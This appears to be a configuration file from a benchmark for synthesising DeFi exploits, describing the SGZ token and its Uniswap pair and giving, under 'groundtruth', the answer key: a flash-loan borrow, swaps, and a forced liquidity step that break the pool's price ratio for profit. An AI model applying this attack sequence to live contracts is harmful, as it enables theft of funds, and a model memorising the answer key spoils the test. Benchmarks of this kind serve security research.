# Information for benchmarks building.
project_name: "SGZ"

ctrt_name2cls:
  - ["usdt", "USDT"]
  - ["sgz", "SGZ"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["usdt", ""]
  - ["sgz", "new SGZ(address(usdt))"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function addliquidity_sgz_pair_sgz_usdt() internal eurus {
        sgz.swapAndLiquifyStepv1();
        pair.sync();
    }"

  - "function swap_pair_sgz_sgz_usdt(uint256 amount, uint256 amountOut) internal eurus {
        sgz.swapAndLiquify();
    }"

extra_deployments:
  - "sgz.afterDeploy(address(router), address(pair));"
extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "usdt", "owner", "100e18"]
  - ["swap", "pair", "attacker", "usdt", "sgz", "usdt.balanceOf(attacker)", "pair.getAmountOut(usdt.balanceOf(attacker), address(usdt))"]
  - ["addliquidity", "sgz", "pair", "sgz", "usdt"]
  - ["swap", "pair", "attacker", "sgz", "usdt", "sgz.balanceOf(attacker)", "pair.getAmountOut(sgz.balanceOf(attacker), address(sgz))"]
  - ["payback", "usdt", "owner", "100e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "sgz":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_defientry: true
    hacked_oracles: ["pair"]
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["sgz", "usdt"]
    support_swaps:
      "usdt": ["sgz", "usdt"]
      "sgz": ["sgz", "usdt"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

pattern: "Liquidity Ratio Break"
